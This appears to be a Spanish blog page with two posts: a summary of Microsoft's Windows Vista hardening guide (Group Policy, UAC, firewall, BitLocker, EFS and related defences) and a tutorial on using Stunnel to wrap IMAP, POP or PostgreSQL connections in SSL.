De esta manera aplicaciones como el correo electrónico (Windows Live Mail), los favoritos (Windows Live Favorites), la mensajeria instantanea (Windows Live Messenger) o la geolocalización (Windows Live Local) se complementarán unos a otros tanto en linea como directamente en el escritorio del usuario.

Windows Vista esta en 5 versiones distintas:
· Windows Vista Home Basic Edition. (Equivale al Windows XP Home Edition) Incluye el Windows Firewall, control parental, el Security Center, el Movie Maker, el Photo Library, entre otros. * Para los recién iniciados.
· Windows Vista Home Premium Edition. Incluye todo lo que tiene el Windows Vista Home Basic. Agrega autoría de DVD Video, soporte para HDTV y soporte para la extracción de DVD. Similar al actual Windows XP Media Center pero con funciones añadidas.
· Windows Vista Business Edition. Diseñado para las pequeñas empresas sin personal IT. Soporte para copias de seguridad, ShadowCopy, conexión remota a servidores y PC fax. Acceso prepagado a la suscripción de servicios de Windows Live! Small Business o Microsoft Office Live!.
· Windows Vista Enterprise Edition. Optimizado para la empresa. Trae el VirtualPC y soporte para interfaz multi-lenguaje (MUI). Dirigido a fabricantes y trabajadoras en tecnología de la información.
· Windows Vista Ultimate Edition. El mejor sistema operativo ofrecido jamás para un PC personal. Software para podcasting, gestor para mejoras el rendimiento en juegos, posibles descargas gratuitas de música y películas.


II. SÍNTESIS.
En la guia de fortalecimiento de Windows Vista publicada por Microsoft se busca que la guía cumpliera las siguientes expectativas:
· Probada. Basándose en la experiencia del personal que realizo la guia.
· Confiable. Ofrece el mejor asesoramiento disponible.
· Exacto. Técnicamente probado y validado.
· Aplicable. Proporciona los pasos para el éxito.
· Real. Toma en cuenta los problemas del mundo real en seguridad.

NUEVAS CARACTERÍSTICAS DE WINDOWS VISTA.
· La versión de Windows más segura jamás creada con Windows Defender y Firewall de Windows (en inglés)
· Encuentra al instante lo que necesitas con la característica Búsqueda instantánea y Windows Internet Explorer 7
· Elegante escritorio con Aero de Windows con barras de menús transparentes como el cristal, Flip 3D (en inglés) y miniaturas dinámicas
· La mejor elección para los equipos portátiles con el Centro de movilidad de Windows (en inglés) y compatibilidad con Tablet PC (en inglés)
· Colabora y comparte documentos con el Área de encuentro de Windows (en inglés)
· Disfruta de fotos y entretenimiento en tu sala de estar con Windows Media Center
· Disfruta de Windows Media Center en toda la casa con Media Center Extenders
· Usa la protección contra errores de hardware con las características Copias de seguridad y Restauración de Windows Complete PC (en inglés)
· Usa la copia de seguridad programada para realizar automáticamente copias de seguridad de tus archivos
· Conectividad de red empresarial sin complicaciones con el Centro de redes (en inglés) y el Escritorio remoto (en inglés)
· Protege mejor tus datos frente a posibles pérdidas con el Cifrado de unidad BitLocker de Windows (en inglés)
· Crea DVD fácilmente con Windows DVD Maker
· Diviértete más con tu PC con tres juegos nuevos de primera: Maestros del ajedrez, Inkball y Maestros de Mahjong
· Crea películas de alta definición con Windows Movie Maker en alta definición (en inglés)


HARDENING WINDOWS VISTA
La Guía de Seguridad de Windows Vista proporciona recomendaciones para fortalecer el Sistema Operativo para los dos siguientes entornos:
· Enterprise Client (EC). Los equipos cliente en este ambiente se encuentra en un dominio que utiliza Active Directory y sólo necesitan comunicarse con sistemas que ejecutan Windows Server 2003. Los equipos cliente en este entorno incluyen una mezcla: equipos en Windows Vista y Windows XP. Basada en "Implementing the Security Baseline" y "Security Group Policy Settings."
· Specialized Security – Limited Functionality (SSLF). Seguridad Especializada y Funcionalidad limitada(SSLF). La preocupación por la seguridad en este entorno es tan grande que una pérdida de la funcionalidad y facilidad de administración es aceptable.

APLICACIÓN DE LA BASE DE SEGURIDAD
La finalidad de este parte es mostrar cómo configurar las opciones de seguridad a fortalecer los equipos cliente que ejecutan el sistema operativo por defecto que se unen a un dominio de Active Directory usando el servicio de directorio.

Antes de esto Microsoft basaba la seguridad en la importación de Seguridad de plantilla. Inf y extenso manual de modificación de las Plantillas administrativas parte de varios GPOs.

Para iniciar es necesario:
· Crear una unidad de organizacional (OU) y la estructura de su entorno.
· Ejecute el GPOAccelerator.wsf script.
· Utilice la Consola de Administración de Políticas de Grupo (GPMC) para enlazar y gestionar los GPOs.

La línea de base GPOs proporciona una combinación de la configuración de prueba de que aumentar la seguridad para los equipos cliente que ejecutan Windows Vista en el ambiente
Enterprise Client (EC).

Seguridad diseño y ejecución
· OU diseño de las políticas de seguridad
· GPO diseño de las políticas de seguridad
· Aplicación de las políticas de seguridad

a. OU diseño de las políticas de seguridad.
OU es un contenedor dentro de un dominio que utiliza Active Directory.

Usted puede enlazar un GPO a una OU, que luego se aplican los ajustes de la GPO a los usuarios y equipos que figuran en el que OU y su hijo OUs. Puede delegar el control de un grupo o una persona OU mediante el uso de la Delegación Wizard en la Microsoft Management Console (MMC) de Active Directory complemento Usuarios y equipos de herramienta.

Uno de los principales objetivos de una OU diseño para cualquier entorno es proporcionar una base para una perfecta aplicación de grupo que se aplica a todos los equipos cliente en Active Directory.


b. GPO diseño de las políticas de seguridad.
Un GPO es una colección de configuración de Directiva de grupo que son esencialmente los archivos creados por el Grupo de Política de complemento.

Las configuraciones se almacenan en el nivel de dominio y afectan a usuarios y equipos que figuran en sitios, dominios y OUs.

Puede usar GPOs para asegurar que la política de ajustes específicos, los derechos del usuario, el comportamiento y la informática se aplican a todos los equipos cliente o usuarios en una OU

La figura anterior muestra el orden de precedencia en que GPOs se aplican a un equipo que es miembro de la OU Niño, desde el más bajo orden (1) a la orden más alto (5).

Opciones:
· Puede configurar un Active Directory, sitio, dominio o OU con la opción Bloquear la herencia.
· El Grupo de Política de loopback característica le da al administrador la posibilidad de aplicar la configuración de Directiva de grupo de usuario basada en la computadora a que el usuario está conectado.

Para aplicar la OU diseño descritas anteriormente exige un mínimo de cuatro GPOs:
· Una política para el dominio
· Una política para los usuarios de Windows Vista OU
· Una política para el Desktop OU

En la siguiente figura se expande sobre el anteproyecto OU estructura para mostrar la relación que existe entre estos GPOs y diseño de la OU.

En el ejemplo de la figura, computadoras portátiles son miembros de la Laptop OU. La primera política que se aplica es la política de seguridad local en la computadoras portátiles. Debido a que sólo hay un sitio en este ejemplo, no se aplica GPO a nivel de sitio, lo que deja el dominio GPO como la próxima política que se aplica.

c. Aplicación de las políticas de seguridad.
La aplicación de la concepción de seguridad para los dos entornos descritos en esta guía requiere que use la Consola de Administración de Políticas de Grupo (GPMC)

así que usted no tiene que descargar e instalar la consola cada vez que se necesitan para administrar GPOs en un equipo diferente.
para los sistemas operativos Windows anteriores, la orientación normativa en esta guía para Windows Vista gran automatiza el proceso para poner a prueba la seguridad y aplicar el diseño para el medio ambiente CE

Para aplicar el diseño de la seguridad, hay tres tareas fundamentales para completar:
· Crear entorno de la CE.
· Utilice el GPMC para vincular la VSG CE a la política de dominio de dominio.
· Utilice el GPMC para ver sus resultados.

PROTEGIENDO VISTA CONTRA AMENAZAS.
Windows Vista incluye varias nuevas tecnologías que puede utilizar para ayudar a aumentar la protección contra virus y otras amenazas cibernéticas para los equipos que ejecutan Windows Vista en su entorno.

Internet Explorer ® 7 también incluye varias mejoras que ayudan a proteger contra virus y otras amenazas cibernéticas, tecnologías que ayudan a prevenir la instalación de software no deseado, y tecnologías que ayudan a proteger contra la transmisión no autorizada de datos personales aumentar en gran medida la seguridad del navegador y protección de la intimidad.

Las siguientes nuevas y mejores tecnologías de seguridad en Windows Vista e Internet Explorer 7:

a. Windows Vista defense Technologies.

Estas tecnologías incluyen:
· User Account Control (UAC)
Se puede configurar la configuración de la UAC en la siguiente ubicación: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options Configuración del equipo \ Configuración de Windows \ Configuración de seguridad \ Políticas locales \ Opciones de seguridad

· Windows Defender.
Windows Defender es un programa incluido en Windows Vista, ayuda a proteger a los ordenadores contra pop-ups, de bajo rendimiento, y las amenazas a la seguridad causados por el spyware y otros software no deseado.

También ayuda a detectar y eliminar aplicaciones no deseadas, tales como el adware, los keyloggers, y el spyware. Esta vigilancia aumenta la fiabilidad de los equipos que ejecutan Windows Vista, está habilitado de forma predeterminada en Windows Vista,

· Windows Firewall.
El firewall de Windows Vista está activado por defecto para ayudar a proteger el ordenador del usuario tan pronto como el sistema operativo está en funcionamiento. Además, por primera vez en un sistema operativo de Windows, Windows Vista se integra el Protocolo de Internet (IPsec).
Las opciones avanzadas de Windows Firewall manejan los siguientes perfiles:
i. Domain Profile. Este perfil se aplica cuando una computadora está conectada con una red y authentica a un regulador del dominio en el dominio a el cual la computadora pertenece.
ii. Public Profile. Este perfil es el tipo de la localización de la red del defecto cuando la computadora no está conectada con un dominio. Los perfiles públicos son más restrictivos.
iii. Private Profile. Este perfil se aplica solamente si un usuario con privilegios locales del administrador lo asigna a una red publica fijada previamente. Microsoft recomienda solamente el hacer de esto para una red confible.

· Windows Security Center (WSC)
La característica WSC funciona como proceso de fondo en las computadoras categorías importantes de la seguridad:
i. Firewall
ii. Automatic Updates
iii. Malware protection
iv. Other security settings

· Herramienta de eliminación de software malintencionado.
Cada mes, Microsoft lanza una nueva versión de la herramienta a través de la actualización de Microsoft, de la actualización de Windows, de WSUS, y del centro de la transferencia directa de Microsoft. Cada mes, Microsoft lanza una nueva versión de la herramienta a través de la actualización de Microsoft, de la actualización de Windows, de WSUS, y del centro de la transferencia directa de Microsoft.

· Las políticas de restricción de software
Proveen a los administradores una manera de identificar software de uso y de controlar su capacidad de funcionar en las computadoras locales.

Las políticas de la restricción del software integran completamente con el directorio activo y agrupan la política, puede utilizar políticas de la restricción del software para lograr el siguiente:
Control del software en las computadoras del cliente.
Restringir el acceso a los archivos específicos en las computadoras multiusos.
Evite que los ficheros ejecutables funcionen en las computadoras locales.

b. Internet Explorer 7
Las nuevas tecnologias de seguridad de Internet Explorer 7 incluyen:
· Modo de proteccion de Internet Explorer
· ActiveX Opt-in
· Cross-domain scripting attack protection (verificación de originalidad de Sitios Web)
· Security Status Bar (autenticación de sistios web)
· Phishing Filter au
· Caracteristicas adicionales de seguridad

Caracteristicas adicionales de seguridad incluyen: restricción de add-ons, Binary Behavior Security Restriction ( verifica componentes binarios encapsulados en HTML), Consistent MIME Handling (manejo de procedimientos de las MIME), MIME Sniffing Safety Feature (previene la modificacion de un archivo a uno mas peligroso), MK Protocol Security Restriction (reduce la superficie de ataque bloqueando el protocolo MK), Network Protocol Lockdown (previene del contenido activo), Object Caching Protection (proteccion del cache), Protection From Zone Elevation, restricción de instalacion de ActiveX, restricción de descarga de archivos y Scripted Windows Security Restrictions (restricción de pop ups)

Mandatory Integrity Control
Windows Vista ha dividido en cuatro niveles de integridad las características de todos los procesos y objetos del sistema, con lo que ningún objeto o proceso de nivel de integridad inferior podrá acceder a ningún otro objeto que tenga un nivel de integridad superior. Esto lleva a que por ejemplo, ningún programa que esté corriendo con nivel de Integridad Medio, ejecutado por un administrador, podrá acceder a un objeto de nivel de Integridad Alto de Sistema. Para ello se tendría que hacer correr el proceso con el nivel de Integridad Alto de Sistema. Esto tiene su expresión más visible en el Modo Protegido de Internet Explorer 7, que corre dos procesos, uno con nivel de integridad bajo, que es el expuesto a Internet y otro con nivel de integridad medio que es el que controla al primero.

PROTEGIENDO INFORMACIÓN SENSIBLE
Cada año, cientos de miles de computadoras sin las debidas medidas de seguridad en sus datos, son perdidos, robados, o indebidamente retirados de todo el mundo.
Las siguientes características y servicios para satisfacer mejor las necesidades de protección de sus datos:
· BitLocker Drive Encryption
· Encrypting File System (EFS) Sistema de archivos de cifrado
· Rights Management Services (RMS)
· Control de Dispositivos

BitLocker Drive Encryption.
Ayuda a proteger los datos en un ordenador cliente. Todo el volumen se cifra para prevenir que usuarios no autorizados puedan romper el sistema de ficheros de Windows y de la protección, o la visualización de información fuera de línea en la unidad.

BitLocker Drive Encryption puede bloquear la normal secuencia de arranque hasta que el usuario suministra un número de identificación personal (PIN) o código inserta un llavero USB que contiene las claves de codificación. La máxima protección se obtiene cuando la computadora tiene un Trusted Platform Module (TPM 1.2) para proteger los datos del usuario, y para ayudar a garantizar que un equipo cliente que ejecuta Windows Vista no puede ser alterada mientras el sistema está fuera de línea. BitLocker está disponible en el Windows Vista Enterprise y Ultimate.

Sistema de archivos de cifrado (EFS)
Se puede utilizar EFS para cifrar los archivos y las carpetas para ayudar a proteger los datos contra el acceso no autorizado.

EFS está integrado en el sistema de archivos NTFS y su funcionamiento es completamente transparente a las aplicaciones.

Cuando un usuario o un programa intenta acceder a un archivo encriptado, el sistema operativo automáticamente los intentos de adquirir una clave de descifrado por el contenido y, a continuación, silenciosamente realiza el cifrado y descifrado en nombre del usuario. Las siguientes son las nuevas características de Windows Vista para EFI:
· Puede almacenar las claves de usuario de las tarjetas inteligentes.
· Puede almacenar claves en la recuperación de las tarjetas inteligentes, que permiten asegurar la recuperación de los datos sin una estación dedicada recuperación, incluso durante los períodos de sesiones de escritorio remoto.
· Puede codificar el archivo de paginación de Windows usando EFI con una clave que se genera cuando se inicie el sistema. Esta llave se destruye cuando el sistema se apaga.
· Puede cifrar la caché de Archivos sin conexión con EFI.
· Puede utilizar EFS para evitar que un lectura de archivos cifrados a través de otros sistemas operativos que requieren por el atacante obtener una clave capaz de descifrar el contenido.
· Puede utilizar EFS para proporcionar encriptación en varios discos y carpetas compartidas en la red.

Microsoft recomienda utilizar BitLocker y EFI en combinación para maximizar la protección de datos.

Rights Management Services
Diseñado para proporcionar seguridad y encargados de hacer cumplir la política de uso delicado para el correo electrónico, documentos, contenido Web y otros tipos de información. RMS proporciona la seguridad de la información encriptando la información a fin de que la persistencia de un archivo o como mensaje de correo electrónico se transmite a través de la empresa o por Internet, sólo los que están autenticados y expresamente autorizado a acceder a ella puede hacerlo. Hay tres componentes de RMS:
· RMS server .
· RMS client .
· RMS platform or application .

Control de Dispositivos.
Los dispositivos plug and play (USB, Stick memory, etc.)son un elemento de riesgo para el robo de información.
Windows Vista le permite los administradores utilizar la política del grupo para ayudar a adminstrar la instalación de dispositivos sin autorización, a través de las politicas de grupo:
· De instalacion: Computer Configuration\Administrative Templates\System\Device Installation\Device Installation Restrictions
· De uso: Computer Configuration\Administrative Templates\System\Removable Storage Access
· De auto run y auto play: Computer Configuration\Administrative Templates\Windows Components\AutoPlay Policies.


Firmado de Drivers
El firmado de los drivers que se exige en las plataformas de 64 bits tiene como principal objetivo garantizar la no inclusión de rootkits o troyanos no deseados en modo kernel en el sistema operativo, pero al mismo tiempo busca obtener una garantía de calidad de aquellos que sí deben ser instalados y así mejorar la fiabilidad del sistema.

Tecnologías de protección
Las tecnologías para evitar que se produzca una explotación de una vulnerabilidad de buffer overflow son varias, pero hay dos que son especialmente significativas: DEP (Data Execution Prevention) y ASLR (Address Space Layout Randomization). Ambas incluidas en Windows Vista.

SuperFetch
SuperFetch no es una tecnología que parta de cero, sino que complementa a otra ya existente en Windows XP llamada Prefetch y que en español vendría a significar "precarga".
Prefetch es un término usado en diferentes ámbitos de la informática, por ejemplo se habla de prefetch refiriéndose a las capacidades de los microprocesadores de cargar anticipadamente datos en la cache L1 durante la ejecución de una instrucción con el fin de acelerar al ejecución de aplicaciones, en el ámbito de los navegadores WEB se conoce como Prefetch (concretamente como Link Prefetching) a la capacidad de estos de cargar en caché información de las páginas Web enlazadas cuando el navegador esta inactivo con el fin de acelerar la navegación (pudiendo realizar esto de manera agresiva o solo cuando le es indicado en el código html de link), en programación se hace referencia a este termino apuntando a la precarga de información en memoria antes de que sea necesaria con el fin de ganar tiempo de ejecución y por último en sistemas hablamos de Prefetch como un sistema de gestión de memoria usado en varios sistemas operativos (también esta disponible en Linux) que permite optimizar notablemente la carga de aplicaciones y servicios especialmente al arranque del equipo precargando la información de estos en memoria y reduciendo por tanto el tiempo de inicio.

SuperFetch es un servicio disponible en todas las versiones de Windows Vista y hace un uso intensivo de la memoria partiendo del concepto de que es muy común hoy en día trabajar con gran cantidad de memoria libre en los equipos modernos, para resolver este desaprovechamiento de memoria Windows Vista carga en esta toda aquella información que probablemente utilizará el usuario, para ello mantiene un historial de su comportamiento por días de la semana e incluso por horas de tal manera que cuando desee abrir alguna aplicación concreta esta se encuentre ya cargada en memoria y el proceso de apertura sea mucho más rápido, aun que como es obvio para uso efectivo de SuperFetch se requiere memoria libre suficiente (de ahí las recomendación de 1GB de RAM).

ReadyBoost y ReadyDrive
ReadyBoost es un nuevo sistema incluido en Windows Vista que consigue mejorar el rendimiento del equipo haciendo uso de la mayor tasa de transferencia en búsquedas aleatorias y menor latencia de la memoria flash con respecto al disco duro, de este modo podemos usar dispositivos como llaves USB, memorias SD o Compact Flash para guardar información de caché del disco duro.

ReadyDrive que aplica un concepto emejante al de ReadyBoost pero a los discos duros híbridos (discos duros provistos de una caché flash).

COMPATIBILIDAD DE APLICACIONES.
Una gran parte del esfuerzo de desarrollo para Windows Vista garantiza que las nuevas características y servicios en el sistema operativo de mantener un alto nivel de funcionalidad y la compatibilidad con programas antiguos.

El Microsoft Solution Accelerator para Business Desktop Deployment (BDD) 2007 contiene amplia compatibilidad de las aplicaciones de orientación para permitir a los profesionales de TI a prueba de las solicitudes de compatibilidad con Windows Vista, y mitigar los problemas de compatibilidad descubiertas durante el proceso.

Accesorios de Seguridad.
User Account Control, proporciona un método estándar de separación de los privilegios de usuario y las tareas de las que requieren de administrador.
Protected Mode, esta nueva característica de Microsoft Internet Explorer 7 ayuda a proteger los equipos que ejecutan Windows Vista de la instalación de malware y otros programas dañinos ejecutando el sistema operativo con más bajos y la seguridad de los derechos.

Cambios e innovaciones que pueden causar problemas de compatibilidad con aplicaciones de terceros:
· Nuevo sistema de APIs.
· Windows Vista 64-Bit .
· Versiones del sistema operativo muy antiguas

Asistente de Compatibilidad
Esta función automáticamente especifica un "modo de compatibilidad" de las aplicaciones diseñadas para funcionar con las versiones anteriores de Windows. Cuando Windows Vista detecta las aplicaciones que necesitan para funcionar en los modos de compatibilidad para Windows XP, Windows 2000 o versiones posteriores de Windows, el sistema operativo dirige las aplicaciones que se actualizan automáticamente para funcionar en Windows Vista, sin más intervención del usuario.

Application Compatibility Toolkit
ACT está diseñado para ayudarle a reducir los costos y el tiempo que para resolver cuestiones de compatibilidad de las aplicaciones mejor le permiten desplegar rápidamente Windows Vista.

SEGURIDAD ESPECIALIZADA.
A pesar de que la configuración de este entorno proporciona un mayor nivel de seguridad para los datos y la red, sino que también impide que se ejecuten algunos de los servicios que su organización pueda requerir. Ejemplos de esto son los Servicios de Terminal Server, que permite a varios usuarios a conectarse interactivamente a los escritorios y las aplicaciones en los equipos remotos, y el servicio de fax, que permite a los usuarios enviar y recibir faxes a través de la red utilizando sus computadoras.

La configuración de estos parámetros se ha desarrollado para las organizaciones donde la seguridad es más importante que la funcionalidad.

Algunas organizaciones especializadas, como las de los militares, los gobiernos estatales y locales, y las finanzas son necesarias para proteger a algunos o todos los servicios, sistemas, y los datos que se utilizan con un nivel de seguridad especializados. El SSLF base de referencia está diseñada para proporcionar este nivel de seguridad para esas organizaciones.
SSLF puede reducir la funcionalidad en su entorno. Esto se debe a que sólo se limita a los usuarios de las funciones específicas que se requieren para completar las tareas necesarias. El acceso se limita a las solicitudes aprobadas, los servicios, las infraestructuras y entornos. Las áreas de mayor seguridad y funcionalidad limitada que la SSLF de referencia aplica:
· Servicios de acceso restringido y el acceso a los datos
· Limitado acceso a la red
· Fuerte protección de la red


Servicios de acceso restringido y el acceso a los datos
Deshabilitar las cuentas de administrador,gantizar el cumplimiento de los requisitos más fuertes contraseña, exigir más estricta la política de bloqueo de cuenta, exigir que la política más estricta para los siguientes ajustes de Asignaciones de Derechos de Usuario como Inicie la sesión como un servicio y Iniciar sesión como Batch.

Limitado acceso a la red
Configuración de opciones en el SSLF línea de base que aumentan la seguridad de la red, pero podría evitar que los usuarios acceso a la red son: limitar el acceso a los sistemas cliente a través de la red, ocultar los sistemas de navegar por las listas, control de excepciones de Windows Firewall y llevar a la práctica seguridad de conexión, como la firma de paquetes.

Fuerte protección de la red
Configuración de opciones en el SSLF de referencia que ayuda a prevenir ataques de DoS, las que incluyen: proceso de control de las asignaciones de cuotas de memoria, control objeto su creación, control de la capacidad de depuración de programas y proceso de control de perfiles.

III. ANÁLISIS
Las organizaciones que utilizan los ordenadores y las redes, sobre todo si se conectan a los recursos externos, como la Internet, deben abordar las cuestiones de seguridad en el sistema y el diseño de redes, y cómo configurar y desplegar sus equipos. Capacidades que incluyen la automatización de procesos, gestión remota, acceso remoto, disponibilidad las 24 horas del día, en todo el mundo el acceso, la independencia de dispositivo y el software permitirá a las empresas a ser más racional y productivo en un mercado competitivo. Sin embargo, estas capacidades también exponer a los ordenadores de estas organizaciones a los posibles compromiso.

En general, los administradores deben tener cuidado cuidado para prevenir el acceso no autorizado a datos, la interrupción del servicio, y el uso indebido de computadoras.

En caso de un ataque a los servidores en su entorno es lo suficientemente grave, que podría dañar a toda la organización. Por ejemplo, si el malware infecta a los equipos cliente en la red, su organización podría perder propiedad de los datos, y la experiencia significativa de los gastos generales a regresar a un estado seguro. Un ataque que hacen de su página web fuera de servicio también podría resultar en una importante pérdida de ingresos o de la confianza de los clientes. Este trabajo pretende explicar las contramedidas disponibles en Windows Vista.

IV. CONCLUSIÓN.
La seguridad de Windows Vista se basa en la seguridad de cualquier otro sistema operativo, para lo cual es necesario considerar que normalmente se utilizara como cliente.

Ademas de los puntos de fortalecimiento ya vistos en otros sistemas operativos de Windows, Vista ofrece el mayor seguridad en los siguientes aspectos.
A. Control de Cuentas de usuario, mediante la herramienta UAC.
B. Firmado de Drivers.
C. Fortificación de Servicios
D. La protección contra Desbordamientos de Buffer en Windows Vista, a través de la Prevención, Detección, No ejecución de Datos y Ocultación de Información.
E. Cifrado de datos con Bitlocker.
F. Administración de los recursos de memomria con SuperFetch
G. Administración de politicas de grupo: LGPO en Windows Vista
H. Firewall de Windows Vista.
I. Seguridad en Web con Internet Explorer 7.

V. REFERENCIAS.


www.microsoft.com/spain www.microsoft.com/windowsvista
Windows Vista Security Guide
Threats and Vulnerabilities Mitigation
Secure Configuration Assessment and Management
Libro.
Microsoft, Windows Security, Resource Kit, Ben Smith y Brian Komar.
Microsoft 2005.
http://www.microsoft-watch.com/
Best practices:Windows Vista

http://searchwindowssecurity.techtarget.com/
15 steps to hardening Windows Server 2003

http://technet.microsoft.com/es-mx/

Seguridad en Windows Vista.
Características de Seguridad
de Windows Vista
http://www.trucoswindows.net/
Windows Vista
http://techrepublic.com.com/2001-6240-0.html
10 things you should know about Windows Vista's service hardening
www.segu-info.com.ar

Las novedades de Windows Vista en Seguridad
http://www.diarioti.com/gate/

Windows Vista potenciará la seguridad como estrategia de ventas

miércoles, 27 de febrero de 2008

STUNNEL

INTRODUCCION


Stunnel es un programa muy útil que nos permite utilizar conexiones SSL con clientes y/o servidores que no soportan este protocolo. Algunos ejemplos de uso son:

Utilizar el modo de conexión SSL entre un cliente que tenga esa opción y un servidor POP o IMAP que no.
Utilizar el modo de conexión SSL entre un Servidor que tenga esa opción y un cliente POP o IMAP que no.
Encriptar cualquier conexión TCP entre dos ordenadores, permitiendo opcionalmente el control de acceso al servidor desde determinados clientes.

SINTESIS

Stunnel debe ejecutarse en el extremo de la conexión donde se quiera tener la funcionalidad SSL que de otra forma no se tiene. Así, en el primero de los ejemplos anteriores, habría que ejecutarlo en el servidor POP/IMAP. En el caso de IMAP la orden sería:

stunnel -d 993 -r 143

La opción -d indica en qué puerto debe escuchar. En este caso, puesto que hemos supuesto que el cliente soporta IMAP sobre SSL, el puerto debe ser 993, que es el asignado para ello (IMAPS). La opción -r indica a qué host y puerto debe redirigir la conexión (ésta última ya no es SSL). Si no se indica host se conecta a sí mismo. En este ejemplo es el puerto habitual de IMAP.

Otra forma de hacerlo es:

stunnel -d 993 -l /usr/sbin/imapd – imapd

En este caso no redirige la conexión al puerto estandar de IMAP, sino que el mismo stunnel se encarga de lanzar el servidor, asumiendo así el mismo papel que inetd. En este caso el programa servidor debe soportar ese modo de ejecución (via inetd, no abriendo la conexión por sí mismo). Tras el doble guión se pone lo mismo que en el fichero inetd.conf tras el nombre del ejecutable.

Si el extremo de la conexión donde no tenemos un software SSL es el cliente, también podemos usar SSL. En este caso hay que ejecutar, en la máquina cliente:

stunnel -c -d 1999 -r sslserver:puerto-s

Y configuramos el cliente para que se conecte a locahost al puerto 1999.

Lo importante a recordar a es que:
En modo servidor (cuando no se usa la opción -c), la conexión entrante (por el puerto dado en -d) es SSL, y la que genera stunnel (dada por -r) no lo es.
En modo cliente ocurre justo lo contrario.

Podemos también encriptar cualquier conexión en la que ni cliente ni servidor sean SSL. Por ejemplo, para encriptar la conexión IMAP entre un lector de correo de PC y un servidor:
En el cliente:
stunnel -c -d 143 -r servidor_imap:1999

Habrá que configurar el programa de correo para indicarle que el servidor IMAP es el propio PC (una de las cosas buenas de stunnel es que tiene una versión casi totalmente funcional para PC).
En el servidor:
stunnel -d 1999 -r localhost:143

Aquí también hemos cogido un puerto aleatorio (1999) para la conexión encriptada. Este último caso es lo mismo que se puede conseguir con SSH de la forma:
ssh -L 143:servidor_imap:143 servidor_imap

La ventaja de stunnel es que no hay que tener una cuenta de la máquina remota. Debe ser el administrador de la misma (o nosotros si tenemos allí cuenta) quien arranque el servidor stunnel. No hay que indicarle a SSH un puerto aleatorio porque todo el tráfico encriptado va por la conexión que se establece con el servidor.

CERTIFICADOS
Cuando stunnel funciona en modo servidor, debe presentar un certificado al cliente, como todo servidor SSL. La distribución de stunnel trae uno, pero es conveniente generar uno propio, usando OpenSSL por ejemplo. La clave privada debe residir en un fichero no encriptado para que el programa pueda acceder a ella sin tener que pedir clave. Lo mismo cabe decir si se van a usar certificados en modo cliente, para su autentificación. Esto es un problema importante de seguridad, sobre todo en el caso de un PC, donde cualquier con acceso al mismo podrá acceder a la clave privada. Estaría bien que el programa soportara tenerla encriptada y contemplara formas de acceder a la misma al arrancar, como hace mod_ssl (como pedir la frase de paso al usuario, obtenerla mediante un programa o variables de entorno, etc.).

La autentificación de cliente puede imponerse ejecutando el servidor con la opción -v, cuyo argumento indica el nivel de autentificación exigido. Los valores que puede tomar son:
El cliente puede presentar o no un certificado. Si lo hace, comprobar que es válido.
El cliente debe presentar un certificado, que es verficado por el servidor. Si no es válido no acepta la conexión.
El cliente debe presentar un certificado, el cual debe ser figurar en una lista de certificados válidos almacenados en el servidor.

Un certificado se considera válido cuando va firmado por un CA cuyo certificado conozca el servidor (por tanto no aceptará certificados de cliente auto-firmados).

Estos pueden residir uno en cada fichero o todos en el mismo. En el primer caso, los nombres de los certificados deben tener nombres del tipo XXXXXXXX.0 (generados con openssl x509 -hash), y el nombre del directorio se le pasa a stunnel con la opción -a. Para el segundo caso (todos en el mismo fichero), se usa la opción -A.

Estas opciones nos pueden servir para implementar un control de acceso, para lo cual también se puede utilizar el control de TCP Wrappers, si stunnel se compiló con soporte para ello.


FORMAS DE FUNCIONAMIENTO
Ya hemos visto que stunnel puede actuar como cliente o como servidor. Estos roles se refieren a conexiones SSL, porque el cliente también puede ser servidor de conexiones no-SSL (opción -d), y el servidor puede ser cliente (opción -r).

En el caso del cliente, hay tres fuentes de las que puede obtener la conexión a enviar por el canal SSL:
Opción -d (modo daemon)
Por inetd. Un ejemplo de entrada en inetd.conf es:
servicio stream tcp nowait root /usr/local/sbin/stunnel \
stunnel -c -r host:puerto-s
En este caso no es necesario usar la opción -d porque obviamente la conexión se la da abierta inetd. Esta forma tiene el inconveniente de la lentitud por el arranque del programa en cada conexión.
Mediante un programa externo (con -l). En este caso son la entrada/salida estandar del programa lo que se envía por la conexión SSL:
stunnel -c -r server:puerto-s -l /.../programa


Lo que sí es obligatorio en el caso del cliente es la opción -r, para indicar a qué servidor y puerto SSL hay que conectarse.

En el caso del servidor, puede obtener la conexión SSL de dos fuentes:
Opción -d (modo daemon).
Por inetd, como en el caso anterior.
servicio-s stream tcp nowait root /usr/local/sbin/stunnel \
stunnel -r host:1999

El servidor puede conectarse a un destino de dos formas:
Opción -r
A un programa externo:
stunnel -d puerto-s -l /.../programa
En este caso se conecta con las entrada/salida estandar del programa.

La opción -L es semejante a -l, pero en este caso se abre un pseudo-tty para ejecutar el programa y es el descriptor esclavo del mismo el que se conecta. Esto se usa para encriptar conexiones PPP. En resumen:

Origen Destino
Cliente (-c)
-d, -l, -L, inetd -r
Servidor -d, inetd -r, -l, -L

Si ejecutamos stunnel en el modo inetd, tenemos problemas en sistemas operativos, como Solaris, que no permiten pasar a un programa arrancado de esta forma más de 5 argumentos, por lo que si hay que usar la opción -p o -R (para indicar el fichero de datos aleatorios, si es necesario), puede que tengamos que compilar el programa con esos datos por defecto, de forma que no haya que pasárselos como argumentos.

APRENDIENDO A INICIAR STUNNEL
Es posible usar Stunnel para proporcionar una conexión segura entre bases de datos locales y remotas. Si usted tiene una base de datos en una máquina distinta a la que ubica el cliente psql, es posible proporcionar una conexión segura entre psql y la base de datos. Si su base de datos está ubicada en la misma máquina que el cliente psql, puede proporcionar una igualmente segura conexión entre los dos programas locales.

Debería haber un archivo llamado stunnel en su directorio Stunnel; este es el ejecutable del programa. Las instrucciones incluídas asumen que usted está usando el ejecutable desde este directorio, pero puede copiarlo a /usr/local/sbin, o a otra ruta de su elección. También, puede crear enlaces a este archivo en sus scripts de arranque para que sea automáticamente inicializado cuando el sistema arranque.

Si usa Stunnel con inetd, no necesitará llamarlo desde un script de arranque.

La ejecución de Stunnel en modo demonio es realmente simple, ya esté conectando a una base de datos local o remota. Para usar Stunnel para conectar a una base de datos local, debe iniciarlo como cliente y como servidor (dos procesos diferentes del mismo programa, cada uno corriendo en un puerto distinto). Luego instruirá a psql para que se conecte al número de puerto que el cliente stunnel está usando.

Una vez que psql ha conectado con el cliente, cualquier dato será encriptado y entonces enviado al servidor Stunnel donde es desencriptado y enviado al servidor PostgreSQL. Al cliente debe serle indicado sobre qué puerto correr, además del puerto en el cual está corriendo el proceso servidor.

